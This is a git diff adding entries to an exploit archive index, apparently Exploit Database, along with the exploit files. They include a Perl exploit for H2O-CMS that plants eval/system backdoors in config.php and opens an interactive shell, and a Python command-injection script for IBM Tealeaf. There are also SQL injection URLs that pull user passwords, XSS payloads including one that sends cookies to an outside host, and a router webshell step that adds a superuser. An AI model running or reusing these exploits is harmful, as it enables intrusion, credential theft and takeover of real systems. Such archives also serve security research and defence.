diff --git a/files.csv b/files.csv
index bd42a00c6..27c07355f 100755
--- a/files.csv
+++ b/files.csv
@@ -15269,7 +15269,7 @@ id,file,description,date,author,platform,type,port
17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0
-17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
+17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) SQL Injection Vulnerability",2011-08-03,"Caddy Dz",php,webapps,0
17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow Exploit (MSF)",2011-08-04,"James Fitts",windows,local,0
@@ -29291,3 +29291,30 @@ id,file,description,date,author,platform,type,port
32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0
32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0
+32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 Remote Command Execution Vulnerability",2008-10-25,"Varun Srivastava",multiple,remote,0
+32530,platforms/linux/remote/32530.txt,"Lynx 2.8 '.mailcap' and '.mime.type' Files Local Code Execution Vulnerability",2008-11-03,"Piotr Engelking",linux,remote,0
+32531,platforms/php/webapps/32531.txt,"phpMyAdmin <= 3.0.1 'pmd_pdf.php' Cross Site Scripting Vulnerability",2008-10-27,"Hadi Kiamarsi",php,webapps,0
+32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 'include/common.php' Remote File Include Vulnerability",2008-10-27,Cru3l.b0y,php,webapps,0
+32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 'index.php' Multiple SQL Injection Vulnerabilities",2008-10-27,G4N0K,php,webapps,0
+32534,platforms/unix/dos/32534.py,"Python <= 2.5.2 'Imageop' Module Argument Validation Buffer Overflow Vulnerability",2008-10-27,"Chris Evans",unix,dos,0
+32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 'moderation.php' Cross-Site Scripting Vulnerability",2008-10-27,Kellanved,php,webapps,0
+32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 'modules/banners/click.php' SQL Injection Vulnerability",2008-10-27,DeltahackingTEAM,php,webapps,0
+32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel 'cp_polls_results.php' SQL Injection Vulnerability",2008-10-27,ExSploiters,php,webapps,0
+32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module 'tid' Parameter Cross-Site Scripting Vulnerability",2008-10-28,Ehsan_Hp200,php,webapps,0
+32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6.0 '&NBSP;' Address Bar URI Spoofing Vulnerability",2008-10-27,"Amit Klein",php,webapps,0
+32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 PHP Code Injection and Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0
+32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 'id' SQL Injection Vulnerability",2008-10-28,d3v1l,php,webapps,0
+32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 'view.php' SQL Injection Vulnerability",2008-10-28,G4N0K,php,webapps,0
+32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 'search.php' Cross Site Scripting Vulnerability",2008-10-28,cize0f,php,webapps,0
+32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0
+32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80
+32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0
+32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 'index.php' Cross Site Scripting Vulnerability",2008-10-29,ShockShadow,php,webapps,0
+32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x History Search and Links Panel Cross Site Scripting Vulnerabilities",2008-10-30,"Stefano Di Paola",linux,remote,0
+32549,platforms/asp/webapps/32549.txt,"Dorsa CMS 'Default_.aspx' Cross Site Scripting Vulnerability",2008-10-29,Pouya_Server,asp,webapps,0
+32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 'CrashHangExt.dll' ActiveX Control Remote Denial of Service Vulnerability",2008-10-30,suN8Hclf,windows,dos,0
+32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x Invalid Message Address Parsing Denial of Service Vulnerability",2008-10-30,anonymous,linux,dos,0
+32552,platforms/hardware/remote/32552.txt,"SonicWALL Content Filtering Blocked Site Error Page Cross-Site Scripting Vulnerability",2008-10-30,pagvac,hardware,remote,0
+32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
+32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
+32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
diff --git a/platforms/asp/webapps/32549.txt b/platforms/asp/webapps/32549.txt
new file mode 100755
index 000000000..148379dfe
--- /dev/null
+++ b/platforms/asp/webapps/32549.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31992/info
+
+Dorsa CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E
\ No newline at end of file
diff --git a/platforms/hardware/remote/32552.txt b/platforms/hardware/remote/32552.txt
new file mode 100755
index 000000000..83eb8122e
--- /dev/null
+++ b/platforms/hardware/remote/32552.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31998/info
+
+SonicWALL Content Filtering is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input when displaying URI address data in a blocked-site error page.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of an arbitrary site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to SonicWALL Content Filtering on SonicOS Enhanced 4.0.1.1 are vulnerable.
+
+http://www.example.com/fuck
\ No newline at end of file
diff --git a/platforms/hardware/webapps/32545.txt b/platforms/hardware/webapps/32545.txt
new file mode 100755
index 000000000..9f90e4f88
--- /dev/null
+++ b/platforms/hardware/webapps/32545.txt
@@ -0,0 +1,87 @@
+*Title:*
+
+Allied Telesis AT-RG634A ADSL Broadband router hidden administrative
+unauthenticated webshell.
+
+*Vulnerability Information:*
+- CVE: CVE-2014-1982
+- Type of Vulnerability:
+ - CWE-78 : OS Command Injection
+ - CWE-306 : Missing Authentication for Critical Function
+
+*Affected products:*
+
+- Allied Telesis AT-RG634A ADSL Broadband router. (version 3.3+ and
+probably others)
+
+Other products like,
+ - Allied Telesis iMG624A (firmware version, 3.5)
+ - Allied Telesis iMG616LH (firmware version, +2.4)
+ - Allied Telesis iMG646BD (firmware version, 3.5)
+
+*Vendor:*
+- Allied Telesis : http://www.alliedtelesis.com//
+
+
+has the same vulnerbility, but the vendor reports that the version
+3.8.05 of the firmware has already addressed this issue, but we where
+unable to test nor confirm this information.
+
+*Security Patches / Workaround:*
+
+- Allied Telesis has noted that the AT-RG634A product is no longer
+supported, but gives a workaround
+to mitigate the issue.
+
+Configure the device so that only trusted devices can
+access the target device using the following command,
+
+"WEBSERVER SET MANAGEMENTIP "
+
+*Short Description:*
+
+The Allied Telesis AT-RG634A ADSL Broadband router has a hidden url
+page in their admnistrative HTTP interface capable of executing
+commands as admin without requiring any kind of authentication.
+
+*Description:*
+
+"The AT-RG634 is a full-featured, broadband media gateway and router
+designed for cost-effective delivery of advanced IP Triple Play voice,
+video and data services over an ADSL infrastructure. The RG634
+supports Layer 3 functions, including NAT, DMZ, and Stateful
+inspection firewall for delivery of revenue-generating services such
+as home networking and security services." (from
+www.alliedtelesis.com/p-2345.html)
+
+The Allied Telesis AT-RG634A ADSL Broadband router has a hidden URL
+(/cli.html) page to execute CLI command with admin priviledges,
+available by default and without any kind of authentication.
+
+Having as impact a total compromise of the target device.
+
+*Steps to reproduce:*
+
+- Connect via HTTP to the hidden page http:///cli.html a
+input box is shown, every command typed there will be executed as admin.
+
+Entering the following lines in the hidden page (/cli.html) a new
+telnet admin user called "eviluser" is added to the system.
+
+>> system add login eviluser system set user eviluser access
+>> superuser.
+
+
+*Credits:*
+
+This security issue was discovered and researched by Sebastian Muniz
+(topo), Security Researcher of Groundworks Technologies
+(http://www.groundworkstech.com)
+
+
+*License:*
+
+The contents of this advisory are copyright (c) 2014 Groundworks
+Technologies,and are licensed under a Creative Commons Attribution
+Non-Commercial Share-Alike 3.0 (United States) License:
+http://creativecommons.org/licenses/by-nc-sa/3.0/us/
\ No newline at end of file
diff --git a/platforms/linux/dos/32551.txt b/platforms/linux/dos/32551.txt
new file mode 100755
index 000000000..98e60174b
--- /dev/null
+++ b/platforms/linux/dos/32551.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/31997/info
+
+Dovecot is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted email headers.
+
+An attacker can exploit this issue to prevent recipients from accessing their mailboxes.
+
+For an exploit to succeed, the IMAP client connecting to Dovecot must use the FETCH ENVELOPE command.
+
+The issue affects Dovecot 1.1.4 and 1.1.5.
+
+The following invalid message address header is sufficient to trigger this issue:
+
+"From: ("
\ No newline at end of file
diff --git a/platforms/linux/remote/32530.txt b/platforms/linux/remote/32530.txt
new file mode 100755
index 000000000..7ce9e15d0
--- /dev/null
+++ b/platforms/linux/remote/32530.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/31917/info
+
+Lynx is prone to a local code-execution vulnerability.
+
+Successful exploits may allow attackers to execute arbitrary code within the context of the user running the affected application.
+
+Versions prior to Lynx 2.8.6rel.4 are affected.
+
+.mime.types:
+application/x-bug bug
+
+.mailcap:
+application/x-bug; xmessage 'Hello, World!'
+
diff --git a/platforms/linux/remote/32548.html b/platforms/linux/remote/32548.html
new file mode 100755
index 000000000..717d20176
--- /dev/null
+++ b/platforms/linux/remote/32548.html
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31991/info
+
+Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, change the browser's settings, and launch other attacks.
+
+Versions prior to Opera Web Browser 9.62 are vulnerable.
+
+NOTE: The 'History Search' issue described here may be related to the 'History Search' issue that was previously described in BID 31842 'Opera Web Browser Multiple Cross Site Scripting Vulnerabilities'.
+
+ Click me...
# milw0rm.com [2008-10-30]
\ No newline at end of file
diff --git a/platforms/multiple/remote/32529.java b/platforms/multiple/remote/32529.java
new file mode 100755
index 000000000..8fd5a6b2a
--- /dev/null
+++ b/platforms/multiple/remote/32529.java
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/31916/info
+
+Sun Java Web Start is prone to a remote command-execution vulnerability.
+
+Successful exploits may allow attackers to execute arbitrary commands on an unsuspecting user's computer. This may aid in further attacks.
+
+We don't know which versions of Java Web Start are affected. We will update this BID when more information is released.
+
+BasicService basicService = (BasicService) ServiceManager.lookup("javax.jnlp.BasicService");
+
+URL mike = new URL("file:\\C:\\music.rm");
+
+basicService.showDocument(mike);
diff --git a/platforms/php/webapps/32531.txt b/platforms/php/webapps/32531.txt
new file mode 100755
index 000000000..8f443d1af
--- /dev/null
+++ b/platforms/php/webapps/32531.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31928/info
+
+phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/pmd_pdf.php?db=>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32532.txt b/platforms/php/webapps/32532.txt
new file mode 100755
index 000000000..cbf6db1e9
--- /dev/null
+++ b/platforms/php/webapps/32532.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31929/info
+
+The 'bcoos' program is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+This issue affects 'bcoos' 1.0.13; other versions may also be affected.
+
+http://www.example.com/include/common.php?XOOPS_ROOT_PATH=shell
\ No newline at end of file
diff --git a/platforms/php/webapps/32533.txt b/platforms/php/webapps/32533.txt
new file mode 100755
index 000000000..205d6ab48
--- /dev/null
+++ b/platforms/php/webapps/32533.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31930/info
+
+Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
+
+http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
\ No newline at end of file
diff --git a/platforms/php/webapps/32535.txt b/platforms/php/webapps/32535.txt
new file mode 100755
index 000000000..88c6ad53a
--- /dev/null
+++ b/platforms/php/webapps/32535.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31935/info
+
+MyBB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MyBB 1.4.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.example2.com/cookiejar.php?c=%27%2Bdocument.cookie// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27) %2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//
\ No newline at end of file
diff --git a/platforms/php/webapps/32536.txt b/platforms/php/webapps/32536.txt
new file mode 100755
index 000000000..db134b43a
--- /dev/null
+++ b/platforms/php/webapps/32536.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31941/info
+
+The 'bcoos' program is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects bcoos 1.0.13; other versions may also be affected.
+
+http://www.example.com/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32537.txt b/platforms/php/webapps/32537.txt
new file mode 100755
index 000000000..50cd97ff3
--- /dev/null
+++ b/platforms/php/webapps/32537.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31949/info
+
+All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AIOCP 1.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
\ No newline at end of file
diff --git a/platforms/php/webapps/32538.txt b/platforms/php/webapps/32538.txt
new file mode 100755
index 000000000..1244f2a17
--- /dev/null
+++ b/platforms/php/webapps/32538.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31952/info
+
+PHP-Nuke Nuke League module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/modules.php?name=League&file=index&op=team&tid=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32539.html b/platforms/php/webapps/32539.html
new file mode 100755
index 000000000..e3d417908
--- /dev/null
+++ b/platforms/php/webapps/32539.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31960/info
+
+Internet Explorer is affected by a URI-spoofing vulnerability because it fails to adequately handle specific combinations of the non-breaking space character ('&NBSP;').
+
+An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site.
+
+Internet Explorer 6 is affected by this issue.
+
+Example (In words, this is Example) This causes a link whose URL appears, IN THE ADDRESS BAR, as (may wrap around): http://www.example.com . . .phish.site/ (In words, this appears like "http://www.example.com" ; followed by 30 spaces, a dot, 31 spaces, a dot, 13 spaces, a dot and finally "phish.site/")
\ No newline at end of file
diff --git a/platforms/php/webapps/32540.pl b/platforms/php/webapps/32540.pl
new file mode 100755
index 000000000..81c696f74
--- /dev/null
+++ b/platforms/php/webapps/32540.pl
@@ -0,0 +1,79 @@
+source: http://www.securityfocus.com/bid/31961/info
+
+
+H2O-CMS is prone to a PHP code-injection vulnerability and a cookie authentication-bypass vulnerability.
+
+An attacker can exploit the PHP code-injection issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+Attackers can exploit the cookie authentication-bypass vulnerability to gain administrative access; this may aid in further attacks.
+
+Versions up to and including H2O-CMS 3.4 are vulnerable.
+
+#!/usr/bin/perl
+# ----------------------------------------------------------
+# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)
+# Discovered By StAkeR[at]hotmail[dot]it
+# Download On http://sourceforge.net/projects/h2o-cms
+# ----------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+use LWP::Simple;
+
+my $post;
+my $sysc;
+my $host = shift or athos();
+my $auth = "user=admin&id=1&admin=1";
+my $http = new LWP::UserAgent;
+
+my $write = {
+ 'site_title' => '";""; error_reporting(0); echo"//athos"; "',
+ 'db_server' => '";""; include($_REQUEST["i"]); "',
+ 'db_name' => '";""; eval($_REQUEST["g"]); "',
+ 'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',
+ 'db_password' => '";""; echo system($_REQUEST["s"]); "',
+ 'save' => 'Save',
+ };
+
+
+$http->default_header('Cookie' => $auth);
+$post = $http->post($host.'/index.php?option=SaveConfig',$write);
+
+
+sub start_exec
+{
+ my $site = shift @_;
+ my $exec = shift @_;
+ my $view = get($site.'/includes/config.php?c='.$exec);
+
+ return $view;
+}
+
+sub athos
+{
+ print STDOUT "# Usage: perl $0 http://[host]\n";
+ print STDOUT "# Remote Command Execution Exploit\n";
+ exit;
+}
+
+unless(get($host) =~ /\/\/athos/i)
+{
+ print STDOUT "# Exploit Failed!\n";
+ exit;
+}
+else
+{
+ while(1)
+ {
+ if(defined start_exec($host,$sysc))
+ {
+ print STDOUT "[athos-shell] ~# ";
+ chomp($sysc = );
+
+ print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";
+ }
+ }
+}
+
+__END__
+
diff --git a/platforms/php/webapps/32541.txt b/platforms/php/webapps/32541.txt
new file mode 100755
index 000000000..c364a3804
--- /dev/null
+++ b/platforms/php/webapps/32541.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31963/info
+
+H&H Solutions WebSoccer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+H&H Solutions WebSoccer 2.80 is vulnerable; other versions may also be affected.
+
+http://www.example.com/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32542.txt b/platforms/php/webapps/32542.txt
new file mode 100755
index 000000000..6aace43bf
--- /dev/null
+++ b/platforms/php/webapps/32542.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31966/info
+
+Elkagroup is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+This issue affects Elkagroup 1.0; other versions may also be affected.
+
+http://www.example.com/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0
\ No newline at end of file
diff --git a/platforms/php/webapps/32543.txt b/platforms/php/webapps/32543.txt
new file mode 100755
index 000000000..7184e2886
--- /dev/null
+++ b/platforms/php/webapps/32543.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31968/info
+
+Kmita Catalogue is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Kmita Catalogue V2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/search.php?q=&Search=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/32544.txt b/platforms/php/webapps/32544.txt
new file mode 100755
index 000000000..9e8a643d0
--- /dev/null
+++ b/platforms/php/webapps/32544.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31970/info
+
+Kmita Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/kmitag/index.php?begin=10&catid=3
+
+http://www.example.com/kmitag/search.php?searchtext=&Search=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/32546.py b/platforms/php/webapps/32546.py
new file mode 100755
index 000000000..de5cd1d00
--- /dev/null
+++ b/platforms/php/webapps/32546.py
@@ -0,0 +1,63 @@
+# IBM Tealeaf CX (v8 release 8) Remote OS Command Injection
+# Date: 11/08/2013
+# Exploit author: drone
+# More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630
+# Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/
+# Version: Version 8 Release 8 (likely all versions prior)
+# Tested on: Redhat Linux 6.2
+# CVE: CVE-2013-6719 / CVE-2013-6720
+
+import requests
+from argparse import ArgumentParser
+
+""" Remote OS command injection (no auth)
+ IBM TeaLeaf Version 8 Release 8
+ drone (@dronesec)
+
+ Bonus:
+ LFI at /download.php?log=../../etc/passwd
+"""
+
+
+def run(options):
+ access = "http://{0}:{1}/delivery.php".format(options.address, options.port)
+ data = {"perform_action" : "testconn",
+ "delete_id" : "",
+ "testconn_host" : "8.8.8.8 -c 1 ; {0} ; ping 8.8.8.8 -c 1".format(options.cmd),
+ "testconn_port" : 1966,
+ "testconn_t" : "false",
+ "csrf" : "afe2fce60e94a235511a7397ec5c9a87fb7fc25b", # it doesnt even care
+ "delivery_mode" : 0,
+ "batch_interval" : 60,
+ "polling_interval" : 10,
+ "watchdog_timer" : 30,
+ "max_queue_depth" : 50000000,
+ "timesource_host" : "test",
+ "timesource_port" : 1966,
+ "staticshit_enabled" : "on", # seriously
+ "staticshit_host" : "test",
+ "staticshit_intervalseconds" : 60,
+ "staticshit_port" : 1966
+ }
+
+ response = requests.post(access, data=data, timeout=20.0)
+ if response.status_code == 200:
+ # lazy parsing
+ result = response.content.split("alert('")[1].split('onUnload')[0]
+ for x in result.split("\\n"):
+ if 'PATTERN' in x: break
+ print x
+
+
+def parse_args():
+ parser = ArgumentParser()
+ parser.add_argument("-i", help="Server address", action="store",
+ required=True, dest="address")
+ parser.add_argument("-p", help='Server port', action='store',
+ dest='port', default=8080)
+ parser.add_argument("-c", help='Command to exec', action='store',
+ dest='cmd', default='whoami')
+ return parser.parse_args()
+
+if __name__ == "__main__":
+ run(parse_args())
\ No newline at end of file
diff --git a/platforms/php/webapps/32547.txt b/platforms/php/webapps/32547.txt
new file mode 100755
index 000000000..7771cc296
--- /dev/null
+++ b/platforms/php/webapps/32547.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31971/info
+
+Extrakt Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize
+user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Extrakt Framework 0.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[SCRIPT_DIR]/index.php?plugins[file][id]=
\ No newline at end of file
diff --git a/platforms/php/webapps/32553.txt b/platforms/php/webapps/32553.txt
new file mode 100755
index 000000000..a063c4bd8
--- /dev/null
+++ b/platforms/php/webapps/32553.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/32011/info
+
+phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+We don't know which versions of phpWebSite are affected. We will update this BID as more information emerges.
+
+NOTE: The vendor refutes this issue, stating that the vulnerable script has not been present in the application since either the 0.8.x or 0.9.x releases.
+
+http://www.example.com/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())--
\ No newline at end of file
diff --git a/platforms/php/webapps/32554.txt b/platforms/php/webapps/32554.txt
new file mode 100755
index 000000000..24f96ac2e
--- /dev/null
+++ b/platforms/php/webapps/32554.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/32012/info
+
+SpitFire Photo Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--
